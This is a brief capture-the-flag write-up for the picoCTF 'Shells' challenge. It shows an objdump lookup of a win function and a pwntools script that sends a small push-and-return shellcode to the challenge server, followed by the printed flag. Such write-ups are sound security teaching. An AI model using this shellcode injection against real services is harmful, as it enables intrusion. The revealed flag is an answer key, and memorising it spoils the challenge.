[Go back](./Readme.md)

### Shells - 70 points

Using `objdump` I extracted the address of the win function:

```
$ objdump -d shells | grep win
08048540 <win>:
```

I then used pwntools to generate a call instruction:

```py
from pwn import *

nc = remote("shell2017.picoctf.com", 61986)
shellcode = asm("push 0x08048540; ret")
nc.send(shellcode + "\x90" * (10 - len(shellcode)))
print(nc.recv())
```

```
My mother told me to never accept things from strangers
How bad could running a couple bytes be though?
Give me 10 bytes:
9e33b38da0c2cf684298bc23aa77685e
```
